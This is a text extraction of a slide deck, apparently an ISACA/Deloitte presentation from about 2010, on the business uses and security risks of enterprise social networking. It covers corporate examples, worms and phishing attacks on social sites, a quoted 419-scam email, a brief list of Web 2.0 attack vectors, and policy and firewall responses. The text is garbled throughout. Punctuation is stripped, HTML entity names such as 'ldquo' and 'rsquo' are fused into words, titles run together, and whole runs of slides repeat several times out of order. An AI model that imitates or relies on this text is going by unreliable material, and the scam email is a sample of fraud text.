Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
